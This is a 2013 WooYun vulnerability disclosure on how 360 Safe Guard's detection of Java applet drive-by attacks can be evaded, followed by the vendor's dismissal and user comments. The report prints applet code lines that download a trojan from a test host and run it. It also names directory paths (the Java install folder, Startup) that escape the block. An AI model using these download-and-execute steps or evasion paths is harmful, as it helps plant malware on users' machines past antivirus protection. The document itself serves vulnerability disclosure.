当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022686

漏洞标题:360安全卫士jre Applet挂马检测缺陷以及简单方法绕过检测

相关厂商:奇虎360

漏洞作者: shine

提交时间:2013-04-28 13:52

修复时间:2013-05-02 15:05

公开时间:2013-05-02 15:05

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-28: 细节已通知厂商并且等待厂商处理中
2013-05-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT!

详细说明:

前几天不小心看360安全卫士有对jre漏洞挂马做拦截,所以想绕过,测试了一下!


//之前,有发过给你们邮箱,说附件太大没收到。发网盘后再发邮件给你们就没消息了,效率太低了,还是发乌云效率高点,看看是不是漏洞?漏洞赏金没有,看能不能刷点rank!
//之前邮件描述:
360安全卫士最近对jre漏洞浏览器Applet挂马攻击有做行为检测,如图:


3B4AC49C%4020A31744[1].6E597951.png


但检测存在缺陷以及直接绕过情况,简单测试步骤(详细测试视频和其他相关文件及信息在附件):
             1、如果直接下载,然后就运行木马就是上图的情况,被拦截:
 
             this.downLoad("http://127.0.0.1:8080/360.exe", "C:/Program Files/360.exe");//下载木马
             this.runFile("C:/Program Files/360.exe");//运行
 
            2、在第1步中,是下载木马到本地,然后运行会被拦截,检测规则是两部分相加流程的行为。但如果只下载木马,360却不会拦截,那如果木马下载到系统启动目录,也不拦截,就有点问题了,所以这是个比较严重的规则缺陷:
 
    this.downLoad("http://127.0.0.1:8080/360.exe", "C:/Documents and Settings/Administrator/「开始」菜单/程序/启动/360.exe");//下载木马
 
           3、把木马下载到java安装目录,然后再运行,就直接绕过现有行为检测:
 
      this.downLoad("http://127.0.0.1:8080/360.exe", "C:/Program Files/Java/360.exe");//下载木马
      this.runFile("C:/Program Files/Java/360.exe");//运行
之前邮件附件的网盘地址:
http://pan.baidu.com/share/link?shareid=450929&uk=3961677986
密码:r0vm


漏洞证明:

//今天又做了另一个jre漏洞(CVE-2012-4681)同样方式测试,弄了个综合测试地址:
http://shinewooyun.duapp.com/


视频中简单过程测试代码:


//C:/Program Files/目录
             //    this.downLoad("http://shinewooyun.duapp.com/360.exe", "C:/Program Files/360.exe");//下载木马
	     //    this.runFile("C:/Program Files/360.exe");//运行
              //下载到java安装目录(jre运行目录),运行木马,这一目录行为绕过拦截
             // this.downLoad("http://shinewooyun.duapp.com/360.exe", "C:/Program Files/Java/360.exe");//下载木马
	     // this.runFile("C:/Program Files/Java/360.exe");//运行
              //C:/目录
              this.downLoad("http://shinewooyun.duapp.com/360.exe", "C:/360.exe");//下载木马
	      this.runFile("C:/360.exe");//运行


视频网盘地址:
http://pan.baidu.com/share/link?shareid=453234&uk=3961677986
密码:2k9f

修复方案:

这应该是漏洞吧?

版权声明:转载请注明来源 shine@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-05-02 15:05

厂商回复:

非常感谢乌云白帽子shine的积极反馈和支持
根据该JAVA漏洞的影响范围和挂马利用情况,360木马防火墙目前仅提供了拦截可疑进程利用的防护功能(基于云端响应)。
并没有像针对“暴雷”、2013新年IE0day等漏洞一样提供深层的基于漏洞利用的防御功能,因此对您反馈的JAVA漏洞这类第三方漏洞的利用我们没有界定为安全防护缺陷。
未来我们会根据情况,考虑针对JAVA漏洞进一步加强防御功能,也欢迎乌云白帽子提出更多反馈意见。
另外,如果漏洞报告者对于360安全漏洞响应报告平台的初步处理结果存在异议的话,建议直接回复原邮件进行讨论。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-28 15:03 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    不错

  2. 2013-04-28 15:46 | 0x7575 ( 实习白帽子 | Rank:62 漏洞数:15 )

    牛B

  3. 2013-04-28 15:49 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    这个实用...

  4. 2013-04-29 08:27 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    360邮件回复解释( 有些问题公开讨论一下比较好,并不是针对360啊):我们分析了您报告的安全漏洞,我们认为您报告的并 非是360安全卫士的防护缺陷,原因是我们目前并未 提供“JAVA漏洞防护”的安全功能,类似您看到的JAV A漏洞攻击拦截只是可疑进程行为拦截的一种,会随 着云端行为总结不同而变化,并不是提供一种防护的 安全边界。 而目前被认为穿透后属于防护缺陷的防护安全边界有 非可信程序写入启动项、注入和修改系统文件等等, 请您了解

  5. 2013-04-29 08:49 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    看得出来,360安全卫士并未深层次针对防护这些jre漏洞。说未提供"java漏洞防护",那上面的拦截提示算什么?那它是靠什么规则判断为jre漏洞攻击疑似进程的而不是其他漏洞攻击的疑似进程? 为什么只有上面那个特定地方不提示(当然,可能还其他地方 )?如果能回答这些问题,忽略我也不再说什么了!

  6. 2013-04-29 09:58 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    第2部分启动项的问题,确实有理由否认,所以只说它是个缺陷但第3部分特定路径不提示默认倒计时阻止,而其他路径却提示阻止,防护规则是不是有缺陷?当然,先要确认360安全卫士有这个jre漏洞防护规则?

  7. 2013-04-29 10:21 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    另外,如果忽略,请先私信提示我一下,其他信息我处理一下,只保留视频部分!

  8. 2013-04-29 18:11 | 李白 ( 普通白帽子 | Rank:142 漏洞数:27 )

    @shine 360太没品了..

  9. 2013-04-30 00:23 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @李白 也不要这么说人家,现在数字公司还是不错了!主要是,我觉得他们可能根本没进行严格实际的测试,只做了分析。以为我只是单方面本地多次测试后下的结论。比如:客户端网络原因与云端连接不稳定等情况(例如:断网情况下,可能是无法成功拦截的!),会导致拦截成功率下降。 我测试时,为防止这样的偶然性的误判(例如:每次测试特定路径,写入木马然后执行不拦截的频率正好与云端行为检测的波动同步),所以每次都是连贯性测试的,且反复多次!再出现这样同步情况的几率是很低了(这样的几率可以去参考《量子力学》)! 为了防止本机一些特定因素影响,出现上面的情况,所以找了其他机器多次测试,结果:这个特定路径写入执行木马还是不拦截!

  10. 2013-05-02 22:30 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    360这种对待漏洞像死鸭子一样嘴硬的公司应该直接列入wooyun黑名单

  11. 2013-05-09 10:38 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    sb @奇虎360